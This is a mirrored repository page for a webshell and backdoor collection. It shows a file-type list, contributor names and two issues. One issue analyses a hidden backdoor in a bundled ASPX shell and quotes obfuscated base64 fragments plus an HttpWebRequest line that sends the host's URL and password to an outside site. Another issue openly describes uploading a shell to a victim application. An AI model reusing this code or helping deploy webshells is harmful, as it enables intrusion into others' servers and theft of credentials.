Giter Site home page Giter Site logo

xl7dev / webshell Goto Github PK

View Code? Open in Web Editor NEW
1.8K 60.0 1.0K 23.98 MB

Webshell && Backdoor Collection

Home Page: http://blog.safebuff.com/WebShell/

License: GNU General Public License v2.0

ASP 32.66% C 0.60% ColdFusion 0.08% Perl 2.92% Java 12.17% HTML 0.45% PHP 49.61% JavaScript 0.06% Python 1.10% Ruby 0.16% Shell 0.07% CSS 0.06% M4 0.01% C++ 0.01% Makefile 0.01% PowerShell 0.07%
webshell shell rootkit backdoor

webshell's Introduction

WebShell

This is a webshell open source project https://github.com/xl7dev/WebShell

Category

  • Aar
  • Ascx
  • Ashx
  • Asmx
  • Asp
  • Aspx
  • C
  • Cfm
  • Cgi
  • Javascript
  • Jsp
  • Jspx
  • LICENSE
  • Mysql
  • Nginx
  • Other
  • Php
  • Pl
  • README.md
  • SSH
  • Soap
  • Udp
  • WeBaCoo
  • gdog
  • icmp
  • jar
  • nodejs
  • openfire
  • osx
  • pwnginx
  • python
  • reGeorg-master
  • ruby
  • servlet
  • sh
  • war
  • xml
  • xssshell

Author: 小乐天

webshell's People

Contributors

xl7dev avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

uncia 0x24bin kuiwang t-web cryptedwolf rym4n fengssq tdyhacker totwo dylangywu kslinf peterdocter r00tak pekita1 fcode520 oxdaf64 0dayso fireswood hysia secwiki bongwa shkodskihk xstpl feixuezhi eniac888 m1a0yu3 4kercc solertis chennqqi jaimelopez akityo v1cker zhenxingsea whitesharks koolamusic ioscarry eiwuert arryboom open-insecure mushr00m grayducker l3m0n jerusalemsbell sco4x0 hens0n rainism wivd magictoy tr33-he11 90yongxucai zhulaohei mascc n3t1ab7 p01ice andyxx5686 helloexp zoenbo zoenboko mr-lover 5up3rc 0xmaohou t5ai unkvuzutop imnewbe cyberpods snowdomain wilsonleeee burncode godminer sevck nx4dm1n vf3ng 0isacar rabitw zisungen drummerzoe heikipikker wdjcy mr-smart denismalofeyev kyhvedn puppycodes ganguoyin orf53975 whoaac seif-abaza cyri1s 0x6d6861 predever hoohooho oscommonjs r3m4g sopsmattw taonese m0ns7er dolphln allforlove1997 ma5onic alinew madmercen

webshell's Issues

Backdoor in webshell

Here is one I found.

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 54 in f7cd87f

HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create(YfCnP + this.Request.Url.ToString() + pbzw + Password + ""); HttpWebResponse response = (HttpWebResponse)request.GetResponse();

Variable YfCnP is base64 encoded.

WebShell/Aspx/专版aspx汗血宝马.aspx

Lines 39 to 49 in f7cd87f

string YfCnP = sh;
YfCnP += portble;
YfCnP += vcf;
YfCnP += dwgtg;
YfCnP += bin_data;
YfCnP += fuze;
YfCnP += ouj;
YfCnP += tprq;
YfCnP += idodr;
YfCnP += mtg;
YfCnP += ksgr;

WebShell/Aspx/专版aspx汗血宝马.aspx

Lines 519 to 529 in f7cd87f

ksgr = Encoding.Default.GetString(Convert.FromBase64String(ksgr));
mtg = Encoding.Default.GetString(Convert.FromBase64String(mtg));
idodr = Encoding.Default.GetString(Convert.FromBase64String(idodr));
tprq = Encoding.Default.GetString(Convert.FromBase64String(tprq));
ouj = Encoding.Default.GetString(Convert.FromBase64String(ouj));
fuze = Encoding.Default.GetString(Convert.FromBase64String(fuze));
bin_data = Encoding.Default.GetString(Convert.FromBase64String(bin_data));
dwgtg = Encoding.Default.GetString(Convert.FromBase64String(dwgtg));
vcf = Encoding.Default.GetString(Convert.FromBase64String(vcf));
portble = Encoding.Default.GetString(Convert.FromBase64String(portble));
sh = Encoding.Default.GetString(Convert.FromBase64String(sh));

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 2081 in f7cd87f

string sh = "aHR0";

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 1724 in f7cd87f

string portble = "cDovLw==";

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 1662 in f7cd87f

string vcf = "d3c=";

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 1561 in f7cd87f

string dwgtg = "dy50cm95";

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 1495 in f7cd87f

string bin_data = "cGxhbi4=";

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 1466 in f7cd87f

string fuze = "Y29tL2FydGlj";

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 1449 in f7cd87f

string ouj = "bGUvaQ==";

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 1297 in f7cd87f

string tprq = "bmZvLw==";

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 1179 in f7cd87f

string idodr = "Z2suYXM=";

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 589 in f7cd87f

string mtg = "cHg=";

WebShell/Aspx/专版aspx汗血宝马.aspx

Line 499 in f7cd87f

string ksgr = "P25hbWU9";

Decode YfCnP:
http://www.troyplan.com/article/info/gk.aspx?name=
Maybe there are more backdoors in webshells, use with caution.

Don't be evil.

web shell upload

l uploaded your shell to a victim application and immediately after upload it crashed instead of creating a backdoor why?

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.